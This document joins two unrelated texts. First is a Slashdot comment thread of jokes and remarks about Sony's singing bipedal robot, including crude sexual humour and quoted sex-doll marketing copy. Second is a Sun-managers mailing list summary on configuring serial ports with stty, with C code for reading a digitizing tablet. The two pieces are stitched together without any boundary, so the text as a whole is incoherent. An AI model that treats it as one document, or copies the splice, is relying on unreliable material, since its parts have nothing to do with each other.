TestBoy writes "Sony is releasing a new bipedal robot for home use. It has a 60,000 word vocabulary and can even sing songs." I am especially amused by the photograph of synchronized dancing robots, and the fact that the new bot will cost as much as a luxury car! But it has some impressive stuff like facial recognition
lalala (Score:2, Funny)
Re:lalala (Score:1)
Re:lalala (Score:2, Funny)
Re:lalala (Score:2)
If that's the case, then adjust the clock speed to your skill level.
Sony (Score:2, Insightful)
It's your responsibility (Score:2, Funny)
It's your responsibility to make sure your robot violates no copyright laws when singing.
It's Sony's responsibility (Score:2)
Sick the DMCA on them, see how *they* like it.
Re:It's your responsibility (Score:2, Funny)
Huh? What the fuck do you think the courts and Congress are full of today, if not singing robots?
(Oh, wait, the singing robots have to be sentient first. Guess that rules out Congress and the courts.)
Every problem has an engineering solution! (Score:2)
Not to worry - the ever-thinking engineers at Sony have taken that problem into consideration. Your robot will come with a credit card reader and a cell-phone so that it can charge the appropriate royalties to your card on a per-incident basis... In the event that the cell network is down, the robot is equipped with a redundant payment system: there is a coin slot so that you can make your payments on-the-spot.
Can it sing "Daisy?" (Score:2)
Hero Jr. (Score:2)
Re:Can it sing "Daisy?" (Score:2)
HAL: If you'd like to hear it, I can sing it for you.
Dave Bowman: Yes...I'd like to hear it HAL....Sing it for me.
HAL: It's called "Daisy" Daisy....Daisy.....Give me your answer due.....I'm half-crazy....all for the love of you....
Re:Can it sing "Daisy?" (Score:3, Funny)
Robots have to sing this...
Share and enjoy.
Or Aqua's 'Barbie Girl' (Score:2)
life in plastic, it's fantastic.
You can brush my hair, undress me anywhere...
Yes, it can sing... (Score:1)
-Henry
60,000 work vocabulary (Score:3, Funny)
Re:60,000 WORD vocabulary (Score:2)
But Can it sing Daisy? (Score:1)
how long before the robots.... (Score:1)
Ok, had to get it out of the way early..while we are at it:
I'm afraid I can't let you do that Dave.
Danger! Danger Will Robinson! Danger!!
Imagine a beowulf Cluster of Natalie Portman pouring hot grits over a few of these?
Any other ones I missed?
I'm going to buy one, and then... (Score:5, Funny)
Re:I'm going to buy one, and then... (Score:2, Funny)
;)
HJO (Score:1)
JTT (Score:1)
As long as it doesn't look like Haley Joel Osment [from "A.I." (2001)] I'll probably buy two.
But what about Jonathan Taylor Thomas [imdb.com]?
Honda, too... (Score:1)
Here's the new Honda w/ Link (Score:5, Informative)
Re:library robots (Score:2)
However, I did also want to tell you that the robots at the museum are not increadably responsive. They react to a predefined set of movements, and they are neat to look at, but the fact is, if you have to learn how to use it, and it can't do anything of it's own volision... it's still a tool/toy. They are not fully moble bipeds like the artical would lead you to believe
Where are the USA robots? (Score:2, Insightful)
We've got plenty of bright people in this country, but we don't make things like this.
We can't afford to fall behind in robot development.
Re:Where are the USA robots? (Score:1)
Re:Where are the USA robots? (Score:2)
Re:Where are the USA robots? (Score:3, Insightful)
That's because rich Americans would rather spend $20,000 on a stereo that does everything, or a handheld that can drive your car, instead of a robot that sings and dances at karaoke parties.
Re:Where are the USA robots? (Score:2)
We have enough space for REAL dogs, and REAL children, so why bother?
Re:Where are the USA robots? (Score:2)
That, my friend, is EXACTLY what is wrong with this country...
US companies can't see the return (Score:2)
Re:Where are the USA robots? (Score:3, Insightful)
We fell behind in television development, and that hasn't hurt us any.
Ah, but television (a.k.a. the opiate of the modern masses), doesn't enhance productivity. With their entertainment robots, I think Sony has done a brilliant thing. They've taken the output of their research division and produced a customer facing product. This is extremely difficult with such a speculative technology - just ask Bell Labs. As toys, these robots can demonstrate the technology without requiring the stability of a commercial release. And by offering a new market (besides industrial assembly lines), they can justify increased development expenses because they'll be able to spread the costs over a larger market.
Re:Where are the USA robots? (Score:2)
Government regulation?
The market is a trial and error marketplace. When a product fails, the market will see the failure - hopefully - and the better product will win. But who compensates those that bought the failure? If you believe in the market system, I think you ought to believe even more in the courts. The courts will make the market system even more effective.
Perhaps you only have a problem with excessive product liability lawsuits? (Frankly, it seems that many more lawsuits are filed by business against business...sot the whole "product liability lawsuit as a problem" thing really seems to lose it's bloom.)
Cheers!
Singing and Dancing? (Score:5, Funny)
Re:Singing and Dancing? (Score:1)
Move along.
Advanced Realdoll (Score:2, Funny)
Re:Advanced Realdoll (Score:2)
Finaly! (Score:4, Funny)
I've always wanted a pet robot, now I can feel like it's really the future.
Nothing new (Score:1)
Go here [caltech.edu] for a list of more interesting projects...
Get the Expensive Ones Out of the Way Now (Score:2, Insightful)
This is just too cool. All the Asimov I read growing up and to be honest I never thought I would personally own a robot.
Sure I wont be able to afford one of these. But I can remember when my dad couldn't afford a digital watch or calculator.
The expensive, limited units today. The cheap, multifunctional units tomorrow.
This is cool!
.
Robot bed (Score:1)
That is a bit more practical than the Craftmatic teach-yourself-autofellatio model [craftmatic.com] that's been on TV for years.
Who cares what they can do! (Score:1)
In costume (Score:1)
ED-209 (Score:1)
At least it doesn't look anything like Rob... (Score:2)
Re:At least it doesn't look anything like Rob... (Score:2)
Imagine a film version of Liar? Of course, you'd have to make Calvin's issue more than just a crush on a colleague.
I got no strings to hold me down (Score:2)
Sony's not the only company attempting to recreate Pinocchio [imdb.com]. It'll face competition from ZMP Inc's "Pino" robot [google.com].
Question: Who will get the Disney deal [imdb.com] first?
Re:I got no strings to hold me down (Score:2)
>
> Question: Who will get the Disney deal [imdb.com] first?
Investment plan:
Find out who gets the Disney deal. Short their stock. Find out their closest competitor. Buy all the stock I can afford.
The Disney company sells one or two units to every household, and that's that.
The company that didn't get the Disney deal gets to sell (to your g/f or wife) the version of Pinocchio that accurately interprets the programming command: "Everything you say to your owner is a lie."
Waaaaaay more money in that market, particularly given that the nose of that robot burns out after about an hour or two and you gotta buy her a new one, but by then, she doesn't care
;-)
No Kids (Score:1)
Sadly, I'd be more impressed if it had stuff like facial hair.
Battle Bot... (Score:4, Funny)
60k words? (Score:1)
60k words? That's more than all the slashdot editor's vocabularies put together!
Actually, not too many people have a spoken vocabulary that large.
You don't need more than 200 words (Score:2)
60k words?
... not too many people have a spoken vocabulary that large.
Humans don't really need thousands of words to communicate. Some spoken languages have about 1000 words; others have fewer than 150 [tokipona.org]. Indian Sign Language has about 200 words in common use [inquiry.net].
Re:60k words? (Score:5, Funny)
When these things can read Kanji, then I'll be impressed.
Re:60k words? (Score:2)
Moral of the story: If you want a polite society that values automation and small consumer electronics, put some people on an island with no natural resources, but good trading links, and let simmer for 2500 years.
Prediction: Our first space colonies will have red circles on the sides of their spaceships, not stars.
Re:60k words? (Score:2)
For KIN/chika (near/nearby), the mnemonic device is "With this huge caterpillar near, you'll need an axe to protect yourself!"
$1 per word (Score:1)
Oh yeah, Sony is always overpriced
Imagine the implications of this.. (Score:2, Funny)
Technical info (Score:5, Informative)
More technical info (Score:2)
Press-release [sony.co.jp]
Roujin Z (Score:2, Interesting)
Sounds like Roujin Z [animefu.com] to me. Roujin Z is a very funny anime by Katsuhiro Ôtomo, the director of the famous Akira. In the anime the story follows an old man in a new hightech bed, that is made to care for him. You can read a much longer review here. [haverford.edu]
Cool (Score:5, Funny)
Get it for free... (Score:1)
George Lucas, Fear Me!
Heh, just imagine at next years' Cebit... (Score:5, Funny)
Sony employee: ah Mr Microsoft exhibitor, allow me to introduce our latest model bipedal *hunter-killer* robot, fresh from our development labs...
Robot: is there a problem here ?
MS employee: erm, on second thoughts, just carry on as you were...
Teddy in AI (Score:2)
Re:Teddy in AI (Score:2)
BTW, I didnt say fembot. But if it could cook and clean, ill buy one.
Re:Teddy in AI (Score:2)
Too late.
$ grep robot
.newsrc
[...]
alt.sex.fetish.robots
[...]
This is so cool! (Score:2)
Plus, it's just be cool to have one in the server room to reboot boxes for us, and make coffee
The future (Score:2)
Music industry beware (Score:2, Funny)
Vocabulary (Score:5, Funny)
And the optional computer to translate for you is another $60k.
prototype video (Score:2)
they used what?? (Score:4, Funny)
er, scuse me mr doi, but how do you program it not to fall apart when it falls over?
if(robot->sensor.overload && robot->falling)
{
robot->say("danger, danger, get the hell out my way!");
robot->donotfallapart = true;
}
hmm
Re:they used what?? (Score:2)
How the hell does one program a machine to not fall apart when trips down the stairs or get's kicked by the kids?
I chalk it up to the morons at Fox..."we're infotainment not news damnit"...News.
What's it good for? (Score:5, Funny)
Sony meets RealDoll?
Re:What's it good for? (Score:2)
Just three? Come now, let's aspire to something better than average.
:)
60K words (Score:2)
OTOH, It does have a photographic memory and some command of communication. If Sony would add a cash recognition device, beefed up the SDR-4X's carrying capacity, and pepped up it's mobility in some way, this thing would be great for doing beer runs!
Serious competition for DDR (Score:2, Interesting)
-prator
Re:Serious competition for DDR (Score:2)
What? You mean like these [megatokyo.com] PS2 peripherals?
Ph34r P1n6-ch4n!
Re:Serious competition for DDR (Score:2)
Here's a better Ping strip [llarian.net].
60,000 Word Vocabulary?????? Spare me. (Score:2)
I know a computer can store thousands of words in its RAM or ROM, but calling that a vocabulary is overstretching the point. "Vocabulary" implies comprehension.
I'll wager this robot can't tell its nouns from most of verbs.
Re:60,000 Word Vocabulary?????? Spare me. (Score:2)
This is the "average" vocabulary. If I were dropping $50k on a toy to interact with, I would not want to talk to someone/something with an average vocabulary. The average college grad has approx a 60-80k word vocabulary and the average doctoral grad has approx 80k-120k word vocabulary.
The problem with defining vocabulary however is defining what counts as a real word. Is a vocabulary word one that someone uses properly, or perhaps one that will be understood in some sort of contextual paradigm but not be easily to define?
Additionally, I would be interested to see what is defined as active versus passive uses words in the vocabulary.
Entertainment vs Utility (Score:2)
I wonder if this is what being a god is like. Does she laugh at the pointlessness of it all too? Will Sony make an SDR-5X that makes little robots out of Mindstorms?
Fear the next killer app. (Score:2)
You have been warned.
Funny but nobody's mentioned... (Score:2)
I mean, yeah, it's cool and all, but remember where it comes from.
An army of robots? (Score:2)
Robot Ukemi (Score:2)
Link to video (Score:4, Informative)
Re:Link to video (Score:2)
Something sounded like "auf inderschleiden umf POSITRONIC BRAIN bis hin zum fertigen..."
Whhaaaaattt???? These things are cooler than I thought!
-Russ
PS2 as robot hub? (Score:2, Interesting)
The Aibo is really dumb (Score:2)
This new humanoid unit seems to be an upgrade of the Aibo technology. I'm curious to see how good the balance control is.
When it puts the cat out All night long (Score:2)
Marvin (Score:2, Funny)
Decisions, decisions... (Score:2)
Re:What we need now. (Score:2)
Rock'em Sock'em Robots [yesterdayland.com], baby!
Re:only 23" tall? (Score:2)
You mean you don't want it to say "Home again home again jiggedy-jig. Good evening J.F." and bump into the wall tragi-comedically?
Re:real dolls vs. aibo antics (Score:2)
Other enhancements currently available:
1. Interactive sensory response system: This system is composed of sensors embedded in the Realdoll's breasts, vaginal and anal entries. The doll is connected via an ethernet cable (up to 100') to your PC, and when the various sensors are triggered by activity, the doll will respond with sensor specific audio. The software will run on any Windows based PC, and is completely user editable; The directories for each sensor can be editied to the user's taste by adding or subtracting specific audio files. This system is currently offered in limited quantity. Please check with us for availablity if you are interested in adding this option to your order. The price for this option is currently $1500.00
Fascinating, the things they can do with technology...
DennyK
Re:Where's Harrison Ford when you need him? (Score:2)
Re:Where's Harrison Ford when you need him? (Score:2)
|
http://tech.slashdot.org/story/02/03/19/155206/sonys-new-bi-pedal-robot
|
CC-MAIN-2014-42
|
refinedweb
| 2,627
| 76.42
|
Curl to prompt a User Name and Password
wget username password
curl --netrc
curl username:password header
curlrc username password
curl username:$password php
curl password file
curl authentication without password
I have a password protect web folder on my site, I am fetching that folder on another domain using
Curl, what I want is: when I try to open the URL it should ask me the user name and password, instead of asking it display the "Authorization Required".
Example:
- (password protected using htpasswrd htaccess)
-
If I try to access the "a" url it ask me for the user name password. Fine. but it doesn't ask me for the user name and password on "b" (using curl here).
Any Idea?
In Short: I want to make
Curl ask for the User/Password prompt.
Regards
I am not sure, if it is possible or not? but if it's possible so please let me know how, otherwise I will close this as "Invalid"
Try the following like :
curl -su 'user' <url>
It should prompt
password for the user
Curl to prompt a User Name and Password, Use the -u flag to include a username, and curl will prompt for a password: curl -u username. You can also include the password in the The format of the password file is (as per man curl ): machine <example.com> login <username> password <password>. Note: Machine name must not include https:// or similar! Just the hostname. The words ' machine ', ' login ', and ' password ' are just keywords; the actual information is the stuff after those keywords.
for .htaccess style password protection, You can code the userid password as in:
curl -u userid:password http://.......
Using cURL with a username and password?, Problem We want to use curl to access the site that required http authentication. Solution curl -u username:password Passwords are tricky and sensitive. Leaking a password can make someone other than you access the resources and the data otherwise protected. curl offers several ways to receive passwords from the user and then subsequently pass them on or use them to something else. The most basic curl authentication option is -u / --user. It accepts an argument that is the user name and password, colon separated.
-H 'Authorization: Basic user:pass' user:pass must be encoded in base64
Specify username and password for curl command (Example), It accepts an argument that is the user name and password, colon separated. without specifying the password, and then curl will instead prompt the user for it curl is a solid and simple tool that allows transferring data from and to any server with command line using various protocols including HTTP. To use curl to access the site that required http authentication, need to use -u to pass username and password with a colon between them i.e. <username>:<password>.
Examples:
--user
curl -v --user myName:mySecret
-u
curl -v -u myName:mySecret
(example for Minh Nguyen see)
curl -v -su 'myName'
asks for the pw of user 'myName'.
Passwords, Are there accepted ways of doing this? If the site uses HTTP authentication, then curl will prompt for a password if you provide a user name with curl-users. Prompt for username and password. This message:[ Message body] [ More options] Related messages:[ Next message][ Previous message][ Next in thread] [ Replies] From: Jacky Lam <sylam_at_emsoftltd.com>. Date: Tue, 12 Mar 2002 17:40:53 +0800. Hi,
you can use cookies there I think. The steps would be:
- If you try to curl "" with no cookies, it can return you a html login form.
- Your form's action would point to 2nd server and if the credentials were right, set the cookie there and return (redirect) to server 1.
- And if you curl again, you'd check the cookie on the other side and in this case, it could read that cookie and return you the admin page output instead.
Re: Prompting for password, Use the -u flag to include the user name, and curl prompts for the password: curl -u username. You can also include a curl -u username:password. Written by Rezigned. Update Notifications Off.
Use a cURL with a username and password?, Hi, I'm trying to get the job table using curl, but I can't seem to get it to work. I keep getting a 403 error. curl -u mapr:password -kd @json. T his page shows how to
How to use curl with username and password?, Don't show passwords or user credentials on screen-shares! Sometimes If you run Windows, and use curl, you must name the file _netrc . From man curl:-u, --user <user:password> If you just give the user name (without entering a colon) curl will prompt for a password. Just pass them the keyboard (or a screen/tmux share) and have them type it in.
Do you use curl? Stop using -u. Please use curl -n and .netrc , However, instead of passing the password as a command line argument, having cURL directly prompt for a password is better, as discussed on To do that, use the -u user:pass command line argument. If you skip the password (but leave the colon), then no password is set. If you also skip the colon, then curl prompts for the password. Set the Username and Password via the -u Argument
- Why not just prompt for a login before using Curl?
- hmm that would be cool, my second domain is hosted on a Plesk server, which doesn't allow me to have htaccess over there.. and secondly, may be I don't want to have any password file on my second domain or any scripting...
- I tried this, and it just tells me that it can't resolve host "username".
- I think this should be the accepted answer, worked for me.
- hmm, that a correct approach but I want a Password Prompt, never want to enter the user name or password in a file hosted on my second domain
- Not sure about your environment, if I do it in a shell script. It is something like. read -p "Userid: " userid ; read -s -p "Password: " passwd; curl -u $userid:$passwd http://......
- We need a http Prompt here.. instead of hard coded user name and passwrd
- Let me see if I understand this correctly, on the "b" site you want to access the "a" site on the server side? and you want the "b" to generate a password prompt on the client's browser? You need a CGI on the "b" site to do that.
- If you use any of these methods (including read -s method and any tricks around this), your password can be found in the system, process table: /proc or using strace -p <pid>
- That solution doesn't prompt for a password. You have the password on the
curlcommand line.
- Nopes, it doesn't return the login prompt.. that what I needed!
- Ok but you need to write it yourself. using php or whatever you got there.
- This answer should NOT be accepted, where is the Answer? How do you place PHP_AUTH_USER? A sample with Code would be great for other users! This is just confusing even more!
|
http://thetopsites.net/article/52818424.shtml
|
CC-MAIN-2020-50
|
refinedweb
| 1,194
| 72.36
|
Hello;
Thank you all very much for your prompt and generous help with my problems
including my misunderstanding of UNIX shells. My background in other operating
systems continues to mislead me in such things as the handling of the standard
input and output files, the domains for which such definitions are active, and
the way in which the UNIX process structure affects these definitions for various
forms of command invocation - sub shells, etc. Thanks again for your
patience and advice.
I have summarized the responses into 'programmatic' and 'command line' categories
below. A row of plus signs (++++++) separates the individual suggestions.
In our case I put a data analyzer on the serial line so I could be certain of
both the basic communications parameters and how the data were being handled - the cariage return/line feed issues and the like.
One thing that impressed me greatly was the variation between operating system
versions, and other factors about which I am not clear. On the Sun IPX with
version 4.1.3 of the OS, and using the c-shell, the only version of stty that
would set the non-login port correctly is the System V version: (/usr/5bin/stty
parenb -parodd cs7 cstopb nl;sleep 100000) < /dev/ttya &. The standard BSD
version of stty would only set the login port. On the inquiry side, stty would
report on /dev/ttya if the I/O redirection operator pointed TO the port e.g.
stty -a > /dev/ttya, but would report the login port if redirection was stated in
the way that made intuitive sense to me: stty -a < /dev/ttya; cat > /dev/ttya
sends data to the port, and cat < /dev/ttya accepts data from it.
None of these options would work on some Sun 386i's avaialable to me (V4.0.2).
So, although we have our tablet working fine, I suspect that the generality of the solution I've cobbled together is limited.
allan
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
I. Programmatic
think this is what you want
Output modes
The c_oflag field specifies the system treatment of output:
ONLCR 0000004 Map NL to CR-NL on output.
^^^^^^^^^^
OCRNL 0000010 Map CR to NL on output.
ONLRET 0000040 NL performs CR function.
from the man page on TERMIO, ONLCR might mean having an extra NL, but it
may work or you could try not setting OCRNL and see if CR goes
straight through. You will need to use the stty (man 3 stty) C
command.
Boyd Fletcher
boyd@cs.odu.edu
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
I'm not sure if this will help; I wrote such a program a long time ago
to use a Texas Instruments HI-9018 digitizing tablet on a Sun. Note the
program uses CGI graphics. This has been abandoned by Sun but you might find
it in an "old" directory or should be able to either comment it out or
replace it. Anyway it might give you some ideas/ a starting point.
Certainly it worked for us a couple of years ago when we needed to do some
digitizing.
/* HI 9018 digitizer
* To compile: cc -O -o hi9018 hi9018.c -lcgi -lsunwindow -lpixrect -lm
* NOTE: Assumes ASCII_2 mode to circumvent hardware bug
* (else you will probably get a sscanf error)
* Uses cgi plotting to current Sun window
* invocation: hi9018 [-b baud] [-d] [-n] [-z zval] [-p]
* -b baud : set baud rate to baud; default is 4800
* -d : set debug mode, print out extra info
* -n : don't strip out tag bit. Default is to strip.
* -z zval : add a constant z coordinate zval to x y [tag] output
* -p : create crude cgi plot to Sun window; tag = 1 is 'pen down',
* tag = 2,3,4 is 'pen up'. The first two points digitized MUST
* be the upper right and lower left corners to initialize the
* plot scaling. */
#include <stdio.h>
#include <sgtty.h>
#include <signal.h>
#include <sys/file.h>
#include <sys/ioctl.h>
#include <sys/ttydev.h>
#define PORT "/dev/ttyb"
#define DEFBAUD 4800
#define TRUE 1
#define FALSE 0
static char *usage = "usage: hi9018 [-b baud] [-d] [-n] [-z zval] [-p]";
static char *badstr = "possible bad input:";
/* Global for catcher() to see */
static int plot = FALSE;
main(argc,argv)
int argc; char *argv[];
{
register int f,nb; int urx,ury,llx,lly,debug=FALSE;
int baud= DEFBAUD,strip = TRUE,catcher(),x,y,tag,first=TRUE;
char buf[80], *s, *z = NULL, tagl; struct sgttyb stty;
for (f = 1; f < argc; f++)
switch (*(argv[f]+1)) {
case 'n': strip = FALSE; break;
case 'b': baud = atoi(argv[++f]); break;
case 'd': debug = TRUE; break;
case 'z': z = argv[++f]; break;
case 'p': plot = TRUE; break;
default : exit(fprintf(stderr,"%s\n",usage)); }
if ((f = open(PORT,O_RDWR,0)) <= 0) exit(perror("open"));
if (ioctl(f,TIOCGETP,&stty) < 0) exit(perror("TIOCGETP"));
switch (baud) {
case 1200: stty.sg_ispeed = stty.sg_ospeed = B1200; break;
case 2400: stty.sg_ispeed = stty.sg_ospeed = B2400; break;
case 4800: stty.sg_ispeed = stty.sg_ospeed = B4800; break;
case 9600: stty.sg_ispeed = stty.sg_ospeed = B9600; break;
case 19200: stty.sg_ispeed = stty.sg_ospeed = B19200; break;
default: exit(fprintf(stderr,"%d not valid speed\n",baud)); }
stty.sg_flags &= ~(ECHO|CRMOD); stty.sg_flags |= TANDEM;
if (ioctl(f,TIOCSETP,&stty) < 0) exit(perror("TIOCSETP"));
signal(SIGTERM,catcher); /* set up clean exit for kill modes */
signal(SIGINT,catcher); signal(SIGQUIT,catcher);
/* if real-time plot then
* 1) get upper right (X,Y)
* 2) get lower left (X,Y)
* 3) initialize cgi plot mode. */
if (plot) {
if ((nb = read(f,buf,sizeof(buf)-1)) > 0 )
{ if (sscanf(buf,"%c%d%d\n",&tagl,&urx,&ury) != 3)
exit(perror("sscanf")); }
else exit(perror("ur read"));
if ((nb = read(f,buf,sizeof(buf)-1)) > 0 )
{ if (sscanf(buf,"%c%d%d\n",&tagl,&llx,&lly) != 3)
exit(perror("sscanf")); }
else exit(perror("ll read"));
if (debug)
{ printf("%s\n",buf);
printf(" %d %d %d %d\n",urx,ury,llx,lly); }
}
while (TRUE) /* Suck up input from digitizer (until signal occurs) */
{
if ((nb = read(f,buf,sizeof(buf)-1)) > 0 )
{
if (sscanf(buf,"%c%d%d\n",&tagl,&x,&y) != 3)
exit(perror("sscanf"));
tag= ((int) tagl) >> 4; /* See Appendix D-2 */
if ((tag % 2) == 0) tag -=3; else tag-- ;
if (debug)
{ printf("%s\n",buf);
printf(" %c %d %d %d\n",tagl,tag,x,y); }
if (plot) {
if (first == 0) plotpt(x,y,tag);
else { wininit(urx,ury,llx,lly,x,y); first= FALSE; } }
if (z == NULL) {
if (strip) printf("%6d %6d \n",x,y);
else printf("%6d %6d %d \n",x,y,tag); }
else {
if (strip) printf("%6d %6d %s \n",x,y,z);
else printf("%6d %6d %d %s \n",x,y,tag,z); }
fflush(stdout);
}
else if (nb < 0) perror("read");
}
}
/* Catch termination signal and exit gracefully */
catcher(sig,code,scp) /*ARGSUSED*/
int sig,code; struct sigcontext *scp;
{ if (plot) endwin();
printf("\nhi9018 terminating on signal %d\n",sig);
exit(0); }
#include <cgidefs.h>
Ccoorlist plotlist;
Ccoor plot_coords[2], vpll, vpur, lower, upper;
Cint name;
wininit(urx,ury,llx,lly,x1,y1)
int urx,ury,llx,lly,x1,y1;
{
int xdif, ydif;
Cvwsurf device;
NORMAL_VWSURF(device,PIXWINDD);
open_cgi();
open_vws(&name, &device);
upper.x= urx; upper.y= ury;
lower.x= llx; lower.y= lly;
xdif= (urx - llx)/ 20; /* 5% boundary */
ydif= (ury - lly)/ 20; /* (Outliers will be clipped) */
vpll.x = llx - xdif; vpll.y= lly - ydif;
vpur.x = urx + xdif; vpur.y= ury + ydif;
vdc_extent(&vpll, &vpur);
rectangle(&lower, &upper);
plot_coords[0].x= x1; plot_coords[0].y= y1;
plotlist.n = 2;
}
plotpt(x,y,tag)
int x,y,tag;
{
if (tag == 1) /* pen down, move to x,y */
{
plot_coords[1].x= x; plot_coords[1].y= y;
plotlist.ptlist = plot_coords;
polyline(&plotlist);
plot_coords[0].x= plot_coords[1].x;
plot_coords[0].y= plot_coords[1].y;
}
else /* pen up, move to x,y */
{ plot_coords[0].x= x; plot_coords[0].y= y; }
}
endwin()
{ close_vws(name); close_cgi(); }
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Your original is attached below:
BUT...
After you open the device for write, do an ioctl (using a termios struct)
set c_oflag = (c_oflat | ONLRET) & (~OCRNL)
Michael Baumann
Radiation Research Lab |Internet: baumann@proton.llumc.edu
Loma Linda Universtiy Medical Center | UUCP: ...ucrmath!proton!baumann
Loma Linda, California. (714)824-4077|
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
II. Command Line:
As you have probably also noted, Sun delivers 2 versions of stty which
differ in functionality in some ways. /bin/stty is incapable of being
redirected on input, while /usr/5bin/stty can be redirected. That is,
/bin/stty < /dev/ttya fails to read the status of /dev/ttya
but instead gives the same as "stty"
/usr/5bin/stty < /dev/ttya does give the status of ttya
Unfortunately, I was not successful in using the 5bin version to affect
on an output-redirected device, even if I had a process holding the device
open. (ie, the moral equivalent of cat > /dev/ttya running in another
window). I am not clear why /usr/5bin/stty onlcr > /dev/ttya does not
seem to work. CAVEAT: I don't have any serial devices at my disposal,
so I was testing on ports without anything "live" plugged in. This might
invalidate my efforts.
I hope that some other sun-managers with more recent serial interfacing
experience can point you at a package to solve your problem, otherwise
I'm afraid that command-line parsing and ioctl calls within your application
package is the approach I'd be forced to take.
Best of luck, and I'll be looking forward to learn from the net's collective
wisdom.
-tom
Tom Slezak
Human Genome Center, L-452
Lawrence Livermore National Lab
7000 East Ave. Livermore, CA 94550
phone: (510) 422-5746 fax: (510) 423-3608
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
from stty(1) manual page:
DESCRIPTION
stty sets certain terminal I/O options for the device that
is the current standard output. Without arguments, it
reports the settings of certain terminal options for the
device that is the standard output; the settings are
reported on the standard error.
Detailed information about the modes listed in the first
five groups below may be found in termio(4). Options in the
last group are implemented using options in the previous
groups. Note: many combinations of options make no sense,
but no sanity checking is performed.
SYSTEM V DESCRIPTION
stty sets or reports terminal options for the device that is
the current standard input; the settings are reported on the
standard output.
To have stty report on, or control an arbitrary serial port, just use
the usual shell redirection operator so that stty's standard input or
output (depending on which flavor of stty you use) is the port.
I prefer System V, so I would use:
/usr/5bin/stty -onlcr </dev/ttya
Remember that a serial port reverts to its default settings whenever
no process has it open, so you probably need to construct a shell
script that does something like this:
(
/usr/5bin/stty -onlcr
command-that-configures-tablet
) </dev/ttya
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
You have one. From the man page for stty:
> stty sets certain terminal I/O options for the device that
> is the current standard output.
Thus, for example, `stty -ocrnl >/dev/ttya' will set parameters for port `a'.
Rich Schultz
rich@ccrwest.org
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
"stty" doesn't act on "the current session device", except for a few
operations such as "stty size", "stty speed", and "stty -g".
"/usr/bin/stty" acts on its *standard output*, and "/usr/5bin/stty" acts
on its *standard input*.
Both the standard input and output, *by default*, will be the current
session device; however, you can redirect them with the standard UNIX
shell redirection operations, e.g.
stty -onlcr >/dev/ttya # "stty" here is assumed to be "/usr/bin/stty"
or
/usr/5bin/stty -onlcr </dev/ttya
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
ry:
stty options | /dev/ttyx
where ttyx is your port
Thomas
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
You can use stty to configure any serial tty by making it the standard OUTPUT on the command line :
stty ..... > /dev/tty*
similarly to read the current settings use the same redirection :
stty -a > /dev/tty*
I have writen various scripts to control arbitrary serial ports this way.
Make sure you have write access to the required device of course.
----------------------------------------------------------------------
Peter Farmer e-mail: doss@cs.anu.edu.au
Programmer phone: +61 6 249 3434
Department of Computer Science, fax: +61 6 249 0010
2nd floor, Crawford Building,
Australian National University
Canberra, AUSTRALIA
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
stty applies any changes to stdout, while printing to stderr (if you
are not running sys V emulation), so if you wish to change something
on, say /dev/ttyb try the following:
; stty (args) > /dev/ttyb
alan.
-- Alan Hargreaves (VK2KVF) alan@frey.newcastle.edu.au, Uni of Newcastle, UCS. Ph: +61 49 215 512 Fax: +61 49 684 742 ICBM: 32 53 44.6 S / 151 41 52.6 E
Software Bloat - Any UNIX(tm) after Version 7. (Sm@cerberus.bhpese.oz.au)
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
You can make stty mess with an arbitrary port via of the following (I forget which):
stty -options > /dev/ttynn # BSD, probably Sun stty -options < /dev/ttynn # SysV, probably not Sun
If a program doesn't hold the port open, it will revert to some other state after you set it. So, open the port with a program before you do the stty:
(sleep 2147483646 > /dev/ttynn) &
Also make sure that no other program is trying to mess with the port, i.e. a getty started from init.
"To use Fred Brooks' terminology, people keep handing me programs when I'm expecting programming products." -- Me ------------------------------------------------------------------------------- Brian Bartholomew - bb@math.ufl.edu - Univ. of Florida Dept. of Mathematics
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
The standard way that you do this is to create a session which sets the parameters you want then hangs around for a long time, eg run something like this in /etc/rc.local:
(stty -onlcr; sleep 10000000) > /dev/ttya &
Just add the specific stty commands that you need. 10 million seconds is about 5 months so the command should never exit." |
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
I don't have a 4.1.3 system handy, but at least on 4.1.2 stty operates on the device which is its standard output. (The Sys5 version operates on its standard input.) It "should" therefore be possible to apply either version of stty to an arbitrary port (provided, of course that there isn't a getty enabled on it to fight with you for control).
If the problem is that the driver is resetting to defaults on the last close of the device, you could do something like
sleep 60 > /dev/{whatever} &
so that the sleep process will hold the port open while other things happen, thereby keeping any other process' close operation from being the last one.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Try "stty < /dev/ttya" ...
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
cheesy way:
% ( stty -NLCR > /dev/ttyb ; command opt1 opt2 opt3)
stty changes the line discipline for whatever device is the current stdout.
two cleaner ways of doing this: (a) write a streams module you can push on top of the tty stack to do the conversion (b) close your controlling terminal, then open the tty port, then use the ioctl()s from within the interface program to set the line discipline.
(b) gets my vote, but not knowing what the code looks like, the cheesy solution might have to be it.
--hal
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
> ... and *for the current session device*, stty can handle the job on the > command line.
What does that mean ? You should be able do set the tty characteristics of any serial port with commands like "(stty litout; any-command) > /dev/ttyb"
Eckhard R"uggeberg eckhard@ts.go.dlr.de
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
>From the stty man page:
DESCRIPTION stty sets certain terminal I/O options for the device that is the current standard output.
